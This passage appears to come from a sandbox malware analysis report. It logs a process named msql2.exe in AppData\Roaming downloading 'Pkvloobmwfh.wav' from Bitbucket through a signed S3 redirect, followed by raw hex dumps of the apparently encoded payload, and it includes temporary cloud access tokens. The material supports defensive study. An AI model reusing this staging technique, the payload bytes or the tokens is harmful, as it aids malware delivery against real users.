2024-10-13 16:15:15 UTC	1024	IN	Data Raw: e8 b3 74 f0 51 91 5a f4 f3 78 5c 60 93 a7 3a 6b 92 6d 37 dc 3b 54 6e 8b a5 1c d1 47 06 6d 06 2f fb 3d a6 c0 71 86 ac 55 14 e4 97 6f 41 cf be b3 59 89 6b b9 7d 58 b7 1d 53 d5 64 71 91 94 7c c4 dc ce f4 bd 03 6b eb 17 85 db 14 97 cd 7e cb 3b 1a ce fd cf 11 d2 62 d8 e5 63 cf ff 48 51 a8 48 f1 dd fa 9f f7 9a 47 bb a2 ce 7d 6d a3 1f 30 26 f4 a2 a3 f5 0d 86 f3 a8 0f be be ca 71 cc f9 25 3b 4c f5 39 8c 14 17 92 de bb 28 8b 8c 1d d8 9d 00 8a 61 e9 89 69 15 83 fa 70 21 3d 48 c2 77 46 f5 9b 58 e4 0b 9e ba 11 73 bc 85 2d 15 33 25 57 e9 fb 16 80 81 a1 f7 ff 30 9b 20 52 2b 26 b2 50 99 f3 ce 0d e7 96 a1 0a bb 7a ab 89 6b 2b 1a f9 cf 3a 96 33 40 b2 ff bb 52 fa 11 73 75 5d 52 93 6c db 20 04 73 6c f1 37 b5 d7 85 7a b5 53 75 4e 39 56 f6 72 bc c8 5e 23 34 83 da e1 d1 ac 5d Data Ascii: tQZx\`:km7;TnGm/=qUoAYk}XSdq\|k~;bcHQHG}m0&q%;L9(aip!=HwFXs-3%W0 R+&Pzk+:3@Rsu]Rl sl7zSuN9Vr^#4]
2024-10-13 16:15:15 UTC	16384	IN	Data Raw: 5e d0 f0 6a 44 53 f5 76 8c fe 95 b9 e3 a7 52 33 e5 f0 c7 ee 0a 48 d3 e3 71 57 ad b6 b1 ed 09 85 38 ae 36 b0 93 e9 4b 92 29 ea e7 f4 85 0a 67 7d ed 27 79 76 a1 1f 0c b6 1b 4b 72 5b f3 92 1e bc 59 d4 40 6b 77 0d ce 77 41 68 db b3 28 47 01 80 68 1a fd 5e 23 fb 09 2f f0 8a 22 e2 b1 03 c5 20 b1 8a 8e a7 62 3d 61 44 8b d2 1f fc ac 70 69 1c 97 b2 7e d8 89 04 f1 08 82 c4 69 52 9e 7e cc 71 39 37 c2 14 2d c7 ea c1 83 2e 64 8a fa 94 69 a3 79 d3 b1 da bb 2a 09 11 ee 1e 34 ae b5 ea 76 c0 1b 8d d9 72 38 7b 42 6a f4 e8 79 a1 9e 7f bc 8d 81 46 06 66 3c 55 c0 4e 68 4c 59 a5 5e c8 31 50 12 e4 b3 5a df ac 87 20 29 c0 ae d6 40 75 e8 65 62 3e 3a 83 95 8a 55 06 c7 21 9c 0c 35 eb 50 56 d2 73 6e 42 5f ac 8f 1f 25 3e 44 b8 e5 d3 ba e8 60 51 c5 94 41 74 cd a2 fb 6e 94 74 99 d1 78 Data Ascii: ^jDSvR3HqW86K)g}'yvKr[Y@kwwAh(Gh^#/" b=aDpi~iR~q97-.diy*4vr8{BjyFf<UNhLY^1PZ )@ueb>:U!5PVsnB_%>D`QAtntx
2024-10-13 16:15:15 UTC	1024	IN	Data Raw: d1 97 d4 2f 08 73 b3 08 37 c7 e2 bb 80 d9 fa 03 d1 39 28 ac d3 92 31 a9 a0 e6 80 45 24 47 01 8c aa 2f c5 93 5c b4 92 a8 c8 ae b9 18 54 f3 7f c4 55 d2 9c a7 21 30 17 75 6e cc f5 e8 80 38 3d 45 ff 76 b7 99 17 31 a4 7e 39 1a 3b a4 6b 37 ef 77 a3 d9 76 c6 71 83 15 0c 9c 11 3e 00 76 1e 0b 31 fe 74 f3 09 db 73 d1 e3 ee 80 84 ca 32 7f fa 09 a5 54 69 fc 0f ae ae 83 a4 29 b1 9d b8 01 c8 9a 59 b8 ef 13 f3 b4 d3 71 96 d0 fe 9b 66 43 e7 b1 60 7c d3 25 3a f8 d1 1c d9 d0 96 51 a8 72 21 f2 e5 7c 40 97 db c5 a7 bb 01 d2 b2 a7 ba 7f bb 4c 07 25 77 8e 38 b4 46 77 8f 41 77 2f c2 34 5e f1 dc ae 1b 04 6d 52 a5 43 fc ea 5f b6 0e 67 02 36 2f 9c ce 86 5b 6c 62 c4 c1 89 a4 0a 84 33 ed 2d 24 7f ba 2b 5a d5 9f 37 dd 14 f8 35 4a ab 15 43 40 ec e6 45 8e 45 a5 e0 17 a5 1b f2 fe f4 c3 Data Ascii: /s79(1E$G/\TU!0un8=Ev1~9;k7wvq>v1ts2Ti)YqfC`\|%:Qr!\|@L%w8FwAw/4^mRC_g6/[lb3-$+Z75JC@EE
2024-10-13 16:15:15 UTC	16384	IN	Data Raw: 7f 72 0e 7d de f0 76 1a 97 9d d9 a1 12 53 57 80 ab 1f 8a 5a 16 fb 14 81 fe 6b f0 25 b9 3c 72 b3 90 77 1b 19 6c 81 03 e0 72 59 62 d2 89 bd 33 0c 7d bc 5b 58 3f c7 d7 9f 32 a3 36 49 8c 64 82 74 dd 76 e6 c7 74 9e 8e 30 1e 66 1e 8e 9b f2 78 a3 fb 66 e4 51 23 07 24 a5 e5 26 7b ef ff de 8d ae 3e fe 36 0b 5c f9 2a 3a ac d3 8b 00 37 3c cd 81 cb af c2 73 eb c4 e5 7b db 4a 55 2c 22 1a d2 42 be 85 4f 88 c3 a7 c8 56 8c 15 8e f4 f0 df ed 8a b2 bd 2c 84 ee 4e 56 3d fa 2a 3f c1 f1 6b 51 da 6c 46 8c 9b 4c cb a2 93 c7 2f 6e 77 3e 9a 72 71 89 71 c5 ad 6b 3f 41 27 77 97 14 35 b4 27 8d 20 94 a1 03 7a 02 31 7d 61 d5 2d cf 70 51 5f aa 64 ea c1 7b c7 34 0e 31 b7 08 ff 9c 09 94 ac 0d 97 46 b0 fa 54 aa e4 a0 fb a6 ca 1b 79 24 62 ea 67 c5 31 16 27 d5 b9 db 09 a1 11 a1 6c a9 f0 9e Data Ascii: r}vSWZk%<rwlrYb3}[X?26Idtvt0fxfQ#$&{>6\:7<s{JU,"BOV,NV=?kQlFL/nw>rqqk?A'w5' z1}a-pQ_d{41FTy$bg1'l
2024-10-13 16:15:15 UTC	1024	IN	Data Raw: 88 9a 09 1e 53 1c 00 fb ed 01 a9 43 9a 8e a3 09 9a 3d 4a a9 f0 1b 2b 83 5f 95 ff 4c 35 21 12 bd e1 6d 34 1f 38 24 01 79 78 98 c1 42 88 74 ca a4 ff de 9b 41 8b 9e cb 79 d5 d3 20 06 93 0b 55 85 50 27 cf 45 71 93 18 55 a7 e4 a1 ce 3e e9 f0 54 87 c7 4c 9a 79 fa ed 15 9f 70 35 d4 af 22 d8 76 fa 79 d0 8b 64 24 df 52 2a 3e a4 5d 71 d2 e7 3f 17 35 b8 e1 1d 14 a7 b1 dc ba d3 82 81 43 ca 78 5c 7b a3 af f7 af 2e ec 81 4a 74 b7 9c a6 fb 9c e0 bb 3d 29 cb de 29 b6 c4 95 3e 9f ba 9f 48 1d 71 a9 bc b4 c1 cc 32 db 3e a8 13 5f 62 0e 78 67 59 08 4d 72 1a b8 7f a6 53 6e 98 be f1 8d ff 37 b4 05 29 39 99 e1 61 8f dd e6 c6 c4 e1 5e 75 56 d9 3e 5a 17 ee 93 fa 55 6d c3 c7 56 3d f8 62 fc 9e 4d 25 5b 9d d8 e0 d3 c3 39 a0 dd 7a 56 a8 38 df 1b 6e 2d 57 77 54 7b 6b 35 8e 3b 5d 3f 1d Data Ascii: SC=J+_L5!m48$yxBtAy UP'EqU>TLyp5"vyd$R*>]q?5Cx\{.Jt=))>Hq2>_bxgYMrSn7)9a^uV>ZUmV=bM%[9zV8n-WwT{k5;]?
2024-10-13 16:15:15 UTC	13312	IN	Data Raw: ed d9 33 04 f1 99 71 43 56 09 6f 5f 15 b7 5a 13 3c 83 c5 6e 06 f2 4e 0e 39 ea d3 2f 86 46 86 9a ca f0 e9 93 86 ef c7 c4 ce bb c7 7b ae 9d d3 1b 0f c5 48 cf 74 47 6c ac e9 ba 65 ec 55 a3 ee 21 a1 e2 c2 72 d9 b7 c0 9f a9 bb 1a d5 e0 f3 3c 34 53 c4 34 5a 2a e7 6e 69 7f a6 ef 72 19 38 4b 0a 5f d4 d2 6b e2 ee 9c 0d 37 68 fb 68 96 25 65 62 af 68 71 e0 40 d6 f1 b9 41 e0 d1 39 7f e8 0a 76 a4 d3 c8 e9 02 a4 95 3e 16 6e 2b 56 23 0f 7c 83 45 46 21 36 d2 14 aa 45 d3 69 2b 04 60 c1 d4 b7 6b b9 15 8b 68 97 09 c1 96 00 5d 38 ae 8b c8 4f 2f 68 01 ef 1c a9 5e 4a 43 9a 88 f0 ee f6 b5 30 ab 15 58 4c 21 cf 03 e3 7f 1b 3f 60 b4 24 ca c0 b7 3d 9c 8c 65 13 6a 14 7f f8 52 fd 6c 0d 0f 1a 32 4d fa bb eb 69 77 4c 37 b8 5d ce c4 7a 44 41 42 17 13 6a 30 40 4e f9 1c be 84 47 83 ab 3e Data Ascii: 3qCVo_Z<nN9/F{HtGleU!r<4S4Z*nir8K_k7hh%ebhq@A9v>n+V#\|EF!6Ei+`kh]8O/h^JC0XL!?`$=ejRl2MiwL7]zDABj0@NG>
2024-10-13 16:15:15 UTC	16384	IN	Data Raw: c6 9c 09 d2 f6 30 98 6e 30 ca 4d 5a 2f 57 8e 80 d6 b6 65 87 c3 0c fc d2 90 b6 9f 72 28 16 5c c9 26 d1 ab 6f 3b 56 6c 1b c5 78 3c fb 77 1f c6 5b 79 de 4c df a4 b3 b8 ed db 64 ad 1b 71 c3 8c f6 b4 1e f0 da 1b d0 14 a2 82 78 5d a1 f8 ef 0c 6b 11 5f d5 af 66 4e 48 5c f6 04 9b 57 e9 e5 a1 13 ab f5 f6 92 54 ab 54 72 10 24 12 ae 90 51 23 98 90 05 d3 78 e3 4b c6 05 53 5c 37 65 81 c0 54 50 0f e5 85 78 67 aa 5c c5 b1 7f 05 2c 32 85 a1 ac ae ba b7 b1 bf f8 bb 44 9c 5b 01 62 00 98 05 92 c7 bd 15 11 ad cb a9 42 a4 ec e5 96 e2 51 19 8d 9b f6 17 e3 23 e9 3e 4c 3b 91 19 a6 47 38 7a 01 b9 47 97 5e 4b 57 68 b3 b6 6b 09 cb 0a 39 e2 0f 61 ee a0 eb 2c de 86 0e ab 58 d1 ca f6 a5 e9 03 62 9f c9 b3 e1 13 cc 49 9e b6 5f ec 47 7d 73 f4 49 c6 61 e7 e1 c8 b2 56 db 7d 67 a6 21 c2 f9 Data Ascii: 0n0MZ/Wer(\&o;Vlx<w[yLdqx]k_fNH\WTTr$Q#xKS\7eTPxg\,2D[bBQ#>L;G8zG^KWhk9a,XbI_G}sIaV}g!
2024-10-13 16:15:15 UTC	1024	IN	Data Raw: b4 be 3f db 21 76 74 15 23 42 ac a0 d4 21 58 3a 13 e3 32 27 a3 d4 18 46 03 b7 08 1b 0d 98 f6 f2 df 0b 2e 4b c9 33 8c 78 42 26 87 8a 03 d1 6d 33 43 d1 e6 1e 0b 60 bc 4e 06 4e 36 61 08 74 df 53 23 01 43 ff 2b d3 00 0d 91 e0 7e 0f 05 17 8a f6 1a 1f d8 f8 09 c2 a0 2b 37 0e 47 c8 33 94 fb 90 6d 22 97 c8 2d e0 39 e3 30 0d 58 31 05 12 42 1f b7 5a 1b db fc bd 86 69 b7 6d 6a 62 24 99 9d f6 ef 77 dc 5a 5a 6c 7c 0d 01 1b 33 2a c5 be 87 3e 28 4d 87 92 84 d1 82 7b 9b a8 80 f8 b1 e0 01 e9 8a 09 15 01 46 d4 0e 1b 0f fc c2 d1 e3 8d 84 88 1c f8 06 84 59 b6 30 c2 4d 52 e7 d1 a6 18 de 0b 88 f0 8a 5d d7 5a c6 51 db 25 a1 fd 0a 4d 95 c4 68 3f 20 c4 57 7d 18 33 3e 68 1a ee 88 2f e9 fb c3 22 02 1e c8 bf a3 db b3 4f 2c 19 59 2f 95 ab ea fb e4 68 bb a0 e7 3a 1c a5 41 8a 6a d3 27 Data Ascii: ?!vt#B!X:2'F.K3xB&m3C`NN6atS#C+~+7G3m"-90X1BZimjb$wZZl\|3*>(M{FY0MR]ZQ%Mh? W}3>h/"O,Y/h:Aj'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	185.166.143.49	443	5356	C:\Users\user\AppData\Roaming\msql2.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-13 16:15:21 UTC	119	OUT	GET /312351234123/12312312412adsada/downloads/Pkvloobmwfh.wav HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
2024-10-13 16:15:21 UTC	5161	IN	HTTP/1.1 302 Found Date: Sun, 13 Oct 2024 16:15:21 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Server: AtlassianEdge Location: https://bbuseruploads.s3.amazonaws.com/871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b257e69b-6ad2-4b4c-8f05-9171e7fe5496/Pkvloobmwfh.wav?response-content-disposition=attachment%3B%20filename%3D%22Pkvloobmwfh.wav%22&AWSAccessKeyId=ASIA6KOSE3BNAIEU5YMO&Signature=Y%2BkNCurOwDf4%2BG0%2FzFFY6FKruwo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJHMEUCIQC57jwP7qZA9s0cFKU9SBdzO9gQeLtilBP0Cm4JQ7SzDwIgGSyDJhK3XDy%2FupW9ssflW2rOIhtc0AjilHnow0HTkOAqsAIIwf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDP7HIFwzluVBCF7xRyqEAlm9JYPO9gnDehGXhbbznEnybAZn4AZLgEtNIQ6VF%2FoLeFJuQ%2BOaS5KY4lmEPGee2M9B1T%2FjxP5DPE4kaKIdpDTInWbrJ2ryzbGFg%2BeSSGJbasIqfkNdrFpx3CTtFfMhaNFzevzbe%2Flg9QZQe8m4x1hG%2BoT87oMeLNm7iUJ9A1RNfcaWVJbPmJpu1FbCPpQkwgwUSYVzFy9azroRq%2F0AvFuB%2FWdtnrDsBU5OsbHsrW6b%2BD1YuhfE6J33vaODmQ34LEvEVBmTKl0hegCUEvguNZSxnZDWE1rCr4mG1a1gCmL%2F83%2BBE5bT2Rx0WHPbmBaFl3zV7z%2BaTvHohiudbjzu2lxK4GL8MLDer7gGOp0B6WPmCyzfFSOpj11132NvmtOlkGdSiZaqMvlRur4y3jtnp6a2s6LoeIGX29%2ByeL8IubT21iWiWhSklANWpFyfPfPP5OEBD [TRUNCATED] Expires: Sun, 13 Oct 2024 16:15:21 GMT Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private X-Used-Mesh: False Vary: Accept-Language, Origin Content-Language: en X-View-Name: bitbucket.apps.downloads.views.download_file X-Dc-Location: Micros-3 X-Served-By: 60461519206b X-Version: 28f515bd4e87 X-Static-Version: 28f515bd4e87 X-Request-Count: 1591 X-Render-Time: 0.04069161415100098 X-B3-Traceid: 4903cb629fe64785a5e50ff44fa70ba3 X-B3-Spanid: 128168536ed9bacc X-Frame-Options: SAMEORIGIN Content-Security-Policy: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: ; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; object-src 'none'; connect-src bitbucket.org .bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss: [TRUNCATED] X-Usage-Quota-Remaining: 999312.182 X-Usage-Request-Cost: 699.83 X-Usage-User-Time: 0.018041 X-Usage-System-Time: 0.002954 X-Usage-Input-Ops: 0 X-Usage-Output-Ops: 0 Age: 0 X-Cache: MISS X-Content-Type-Options: nosniff X-Xss-Protection: 1; mode=block Atl-Traceid: 4903cb629fe64785a5e50ff44fa70ba3 Atl-Request-Id: 4903cb62-9fe6-4785-a5e5-0ff44fa70ba3 Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600} Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"} Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Server-Timing: atl-edge;dur=148,atl-edge-internal;dur=3,atl-edge-upstream;dur=146,atl-edge-pop;desc="aws-eu-central-1" Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49743	54.231.232.1	443	5356	C:\Users\user\AppData\Roaming\msql2.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-13 16:15:22 UTC	1201	OUT	GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b257e69b-6ad2-4b4c-8f05-9171e7fe5496/Pkvloobmwfh.wav?response-content-disposition=attachment%3B%20filename%3D%22Pkvloobmwfh.wav%22&AWSAccessKeyId=ASIA6KOSE3BNAIEU5YMO&Signature=Y%2BkNCurOwDf4%2BG0%2FzFFY6FKruwo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJHMEUCIQC57jwP7qZA9s0cFKU9SBdzO9gQeLtilBP0Cm4JQ7SzDwIgGSyDJhK3XDy%2FupW9ssflW2rOIhtc0AjilHnow0HTkOAqsAIIwf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDP7HIFwzluVBCF7xRyqEAlm9JYPO9gnDehGXhbbznEnybAZn4AZLgEtNIQ6VF%2FoLeFJuQ%2BOaS5KY4lmEPGee2M9B1T%2FjxP5DPE4kaKIdpDTInWbrJ2ryzbGFg%2BeSSGJbasIqfkNdrFpx3CTtFfMhaNFzevzbe%2Flg9QZQe8m4x1hG%2BoT87oMeLNm7iUJ9A1RNfcaWVJbPmJpu1FbCPpQkwgwUSYVzFy9azroRq%2F0AvFuB%2FWdtnrDsBU5OsbHsrW6b%2BD1YuhfE6J33vaODmQ34LEvEVBmTKl0hegCUEvguNZSxnZDWE1rCr4mG1a1gCmL%2F83%2BBE5bT2Rx0WHPbmBaFl3zV7z%2BaTvHohiudbjzu2lxK4GL8MLDer7gGOp0B6WPmCyzfFSOpj11132NvmtOlkGdSiZaqMvlRur4y3jtnp6a2s6LoeIGX29%2ByeL8IubT21iWiWhSklANWpFyfPfPP5OEBDF%2BlyxiGIehkTL26uiKY3kAHIryh7iJFv0VuIUt07cr [TRUNCATED] Host: bbuseruploads.s3.amazonaws.com Connection: Keep-Alive
2024-10-13 16:15:22 UTC	530	IN	HTTP/1.1 200 OK x-amz-id-2: M8YcdLl8w7ThJ5/OXt4OOVDuqEQpBpn3YE7/d4581zvCi5X3BFd2KIcCPA53ca4xNpdJc/nw+8s= x-amz-request-id: W7NXBJBFTX02PWN9 Date: Sun, 13 Oct 2024 16:15:23 GMT Last-Modified: Mon, 07 Oct 2024 05:41:20 GMT ETag: "6743b5552184d378f5eb1c1c303af917" x-amz-server-side-encryption: AES256 x-amz-version-id: TrCpjDBI_X1bmuanDpHA_fbr7esTfqxW Content-Disposition: attachment; filename="Pkvloobmwfh.wav" Accept-Ranges: bytes Content-Type: audio/wav Server: AmazonS3 Content-Length: 1199624 Connection: close
2024-10-13 16:15:22 UTC	15764	IN	Data Raw: da 7f 6d da d0 0c c0 a1 5f 20 e8 0f 36 c3 b6 b8 69 e1 8b 64 61 a8 70 00 14 3e 21 c6 4d 0f 67 56 12 63 27 5b 3c 2d b3 02 66 b7 91 48 90 a7 43 e3 80 17 0b 28 00 d0 7c d3 47 95 58 e3 a8 e5 57 e9 28 31 3e 6c b1 2d 69 44 14 1c ec 03 92 1e fd 5d d5 07 25 af 57 a3 1b 54 69 ed d0 e8 6d 81 2b c7 17 c2 c8 9b d4 cb 97 18 48 39 ad 8c 76 cf 40 3e 83 6c a5 73 c3 ef 85 42 73 84 3f ee 2e 5d 3c 70 ef bc 6f 3d 41 21 46 5f d3 7a e8 6e 5b 5e 45 d5 f3 64 12 23 54 72 96 fb c7 8f a8 f6 a8 bd 80 ed d7 7b 8c 9f 1f e1 26 f1 01 ac db 5e 88 72 62 bc 11 04 a4 c9 36 da df 39 dc 46 6d 44 e7 b5 1d ac 0f 06 c0 16 4a 57 36 ef 90 2f 40 bf c9 98 bc 0b 7b 20 e8 19 06 14 92 ae ed 93 0d a7 18 54 55 23 cb e0 d0 47 4f 81 50 4b 9d 98 b9 b0 9d 83 1e 58 12 16 71 36 1e 1a 37 83 15 2b 1a d1 1b 50 d5 Data Ascii: m_ 6idap>!MgVc'[<-fHC(\|GXW(1>l-iD]%WTim+H9v@>lsBs?.]<po=A!F_zn[^Ed#Tr{&^rb69FmDJW6/@{ TU#GOPKXq67+P
2024-10-13 16:15:22 UTC	16384	IN	Data Raw: d3 51 51 39 73 7c bb e5 b5 f9 f7 a8 cf 8e 5f 2c 59 48 7b 63 56 f4 62 a0 d9 7e 4f 0e 94 bb e3 b0 41 cc 35 1a f7 2c 08 b3 5d 4a b5 6e 35 dd e2 0b e2 4c f0 fa 06 67 00 0a b2 2b 85 5a 90 af 67 2e 15 3e be ad 48 3a 6e 99 85 49 b1 3b 3e a3 ce 06 43 74 ec 3d 10 e3 fc 9d 5e 08 94 4a c6 0f aa 9a 44 97 89 27 c3 4a fe 0b 9a 79 4c 10 64 fe c6 48 3a 9a 66 d9 5b 9d a2 a7 40 00 88 e9 b0 75 f0 6b c5 b0 9e ff 04 03 4d 94 49 ce 69 a3 ae 57 09 a1 b5 d8 d6 b7 4c 66 1f 99 94 dd cc 64 b6 b5 c6 cb 13 39 78 f6 cb d1 f3 1e 87 62 19 8f d3 67 a4 0c 88 ad 1b 67 fd 47 b6 23 84 eb 85 0a ee 85 fa aa 3f 0e cf d7 c7 89 6a 8e 8f 75 6e 43 25 7b 39 f8 8f 93 f9 69 8e 46 55 9e 24 b0 89 57 f7 e8 64 0c 25 c4 b1 dc 1d 2b 54 57 59 84 cf c5 64 f2 06 af 32 a6 7a 07 e3 bf c5 d8 3e aa 3e f4 bc 39 35 Data Ascii: QQ9s\|_,YH{cVb~OA5,]Jn5Lg+Zg.>H:nI;>Ct=^JD'JyLdH:f[@ukMIiWLfd9xbggG#?junC%{9iFU$Wd%+TWYd2z>>95
2024-10-13 16:15:22 UTC	1024	IN	Data Raw: b3 74 f0 51 91 5a f4 f3 78 5c 60 93 a7 3a 6b 92 6d 37 dc 3b 54 6e 8b a5 1c d1 47 06 6d 06 2f fb 3d a6 c0 71 86 ac 55 14 e4 97 6f 41 cf be b3 59 89 6b b9 7d 58 b7 1d 53 d5 64 71 91 94 7c c4 dc ce f4 bd 03 6b eb 17 85 db 14 97 cd 7e cb 3b 1a ce fd cf 11 d2 62 d8 e5 63 cf ff 48 51 a8 48 f1 dd fa 9f f7 9a 47 bb a2 ce 7d 6d a3 1f 30 26 f4 a2 a3 f5 0d 86 f3 a8 0f be be ca 71 cc f9 25 3b 4c f5 39 8c 14 17 92 de bb 28 8b 8c 1d d8 9d 00 8a 61 e9 89 69 15 83 fa 70 21 3d 48 c2 77 46 f5 9b 58 e4 0b 9e ba 11 73 bc 85 2d 15 33 25 57 e9 fb 16 80 81 a1 f7 ff 30 9b 20 52 2b 26 b2 50 99 f3 ce 0d e7 96 a1 0a bb 7a ab 89 6b 2b 1a f9 cf 3a 96 33 40 b2 ff bb 52 fa 11 73 75 5d 52 93 6c db 20 04 73 6c f1 37 b5 d7 85 7a b5 53 75 4e 39 56 f6 72 bc c8 5e 23 34 83 da e1 d1 ac 5d fb Data Ascii: tQZx\`:km7;TnGm/=qUoAYk}XSdq\|k~;bcHQHG}m0&q%;L9(aip!=HwFXs-3%W0 R+&Pzk+:3@Rsu]Rl sl7zSuN9Vr^#4]
2024-10-13 16:15:22 UTC	16384	IN	Data Raw: d0 f0 6a 44 53 f5 76 8c fe 95 b9 e3 a7 52 33 e5 f0 c7 ee 0a 48 d3 e3 71 57 ad b6 b1 ed 09 85 38 ae 36 b0 93 e9 4b 92 29 ea e7 f4 85 0a 67 7d ed 27 79 76 a1 1f 0c b6 1b 4b 72 5b f3 92 1e bc 59 d4 40 6b 77 0d ce 77 41 68 db b3 28 47 01 80 68 1a fd 5e 23 fb 09 2f f0 8a 22 e2 b1 03 c5 20 b1 8a 8e a7 62 3d 61 44 8b d2 1f fc ac 70 69 1c 97 b2 7e d8 89 04 f1 08 82 c4 69 52 9e 7e cc 71 39 37 c2 14 2d c7 ea c1 83 2e 64 8a fa 94 69 a3 79 d3 b1 da bb 2a 09 11 ee 1e 34 ae b5 ea 76 c0 1b 8d d9 72 38 7b 42 6a f4 e8 79 a1 9e 7f bc 8d 81 46 06 66 3c 55 c0 4e 68 4c 59 a5 5e c8 31 50 12 e4 b3 5a df ac 87 20 29 c0 ae d6 40 75 e8 65 62 3e 3a 83 95 8a 55 06 c7 21 9c 0c 35 eb 50 56 d2 73 6e 42 5f ac 8f 1f 25 3e 44 b8 e5 d3 ba e8 60 51 c5 94 41 74 cd a2 fb 6e 94 74 99 d1 78 f8 Data Ascii: jDSvR3HqW86K)g}'yvKr[Y@kwwAh(Gh^#/" b=aDpi~iR~q97-.diy*4vr8{BjyFf<UNhLY^1PZ )@ueb>:U!5PVsnB_%>D`QAtntx
2024-10-13 16:15:22 UTC	1024	IN	Data Raw: 97 d4 2f 08 73 b3 08 37 c7 e2 bb 80 d9 fa 03 d1 39 28 ac d3 92 31 a9 a0 e6 80 45 24 47 01 8c aa 2f c5 93 5c b4 92 a8 c8 ae b9 18 54 f3 7f c4 55 d2 9c a7 21 30 17 75 6e cc f5 e8 80 38 3d 45 ff 76 b7 99 17 31 a4 7e 39 1a 3b a4 6b 37 ef 77 a3 d9 76 c6 71 83 15 0c 9c 11 3e 00 76 1e 0b 31 fe 74 f3 09 db 73 d1 e3 ee 80 84 ca 32 7f fa 09 a5 54 69 fc 0f ae ae 83 a4 29 b1 9d b8 01 c8 9a 59 b8 ef 13 f3 b4 d3 71 96 d0 fe 9b 66 43 e7 b1 60 7c d3 25 3a f8 d1 1c d9 d0 96 51 a8 72 21 f2 e5 7c 40 97 db c5 a7 bb 01 d2 b2 a7 ba 7f bb 4c 07 25 77 8e 38 b4 46 77 8f 41 77 2f c2 34 5e f1 dc ae 1b 04 6d 52 a5 43 fc ea 5f b6 0e 67 02 36 2f 9c ce 86 5b 6c 62 c4 c1 89 a4 0a 84 33 ed 2d 24 7f ba 2b 5a d5 9f 37 dd 14 f8 35 4a ab 15 43 40 ec e6 45 8e 45 a5 e0 17 a5 1b f2 fe f4 c3 cb Data Ascii: /s79(1E$G/\TU!0un8=Ev1~9;k7wvq>v1ts2Ti)YqfC`\|%:Qr!\|@L%w8FwAw/4^mRC_g6/[lb3-$+Z75JC@EE
2024-10-13 16:15:22 UTC	2800	IN	Data Raw: 72 0e 7d de f0 76 1a 97 9d d9 a1 12 53 57 80 ab 1f 8a 5a 16 fb 14 81 fe 6b f0 25 b9 3c 72 b3 90 77 1b 19 6c 81 03 e0 72 59 62 d2 89 bd 33 0c 7d bc 5b 58 3f c7 d7 9f 32 a3 36 49 8c 64 82 74 dd 76 e6 c7 74 9e 8e 30 1e 66 1e 8e 9b f2 78 a3 fb 66 e4 51 23 07 24 a5 e5 26 7b ef ff de 8d ae 3e fe 36 0b 5c f9 2a 3a ac d3 8b 00 37 3c cd 81 cb af c2 73 eb c4 e5 7b db 4a 55 2c 22 1a d2 42 be 85 4f 88 c3 a7 c8 56 8c 15 8e f4 f0 df ed 8a b2 bd 2c 84 ee 4e 56 3d fa 2a 3f c1 f1 6b 51 da 6c 46 8c 9b 4c cb a2 93 c7 2f 6e 77 3e 9a 72 71 89 71 c5 ad 6b 3f 41 27 77 97 14 35 b4 27 8d 20 94 a1 03 7a 02 31 7d 61 d5 2d cf 70 51 5f aa 64 ea c1 7b c7 34 0e 31 b7 08 ff 9c 09 94 ac 0d 97 46 b0 fa 54 aa e4 a0 fb a6 ca 1b 79 24 62 ea 67 c5 31 16 27 d5 b9 db 09 a1 11 a1 6c a9 f0 9e 6f Data Ascii: r}vSWZk%<rwlrYb3}[X?26Idtvt0fxfQ#$&{>6\:7<s{JU,"BOV,NV=?kQlFL/nw>rqqk?A'w5' z1}a-pQ_d{41FTy$bg1'lo
2024-10-13 16:15:22 UTC	16384	IN	Data Raw: 89 1e 5c 47 9a 7a 7d 8f 9b b8 ee 4d 09 69 5d 6d 65 61 01 37 ea 2b b2 b8 ae e9 bb 71 19 34 ff 0a ca 0e f2 7e 95 55 80 79 11 ef 00 40 e0 ee e9 af 6f 4d 04 3f 87 ca 9c 11 39 df 12 f6 95 2b d9 57 d2 e2 d8 ae 29 9b 0e 18 80 45 ec b5 ed 76 08 8c ab 0b 66 07 8d 41 53 78 c3 7e 0f 9c b1 22 99 81 01 3e 77 b0 8b a2 07 8d b8 83 a9 95 69 4e f5 27 59 7f 6e e8 b6 e3 a2 d2 14 8d 6f 41 44 59 59 39 56 7a 26 38 45 b7 9e ca 9a c1 16 70 c9 b1 1f ef 18 ae 76 b7 1f 62 ec b8 39 4e 66 eb d7 6a 8a fd 1e 1e e8 4b a9 5d 85 8c 87 ed 04 2e 76 f4 92 77 26 37 a6 36 65 a1 a1 1a 89 1b b2 09 0b 7b 09 5d 81 db 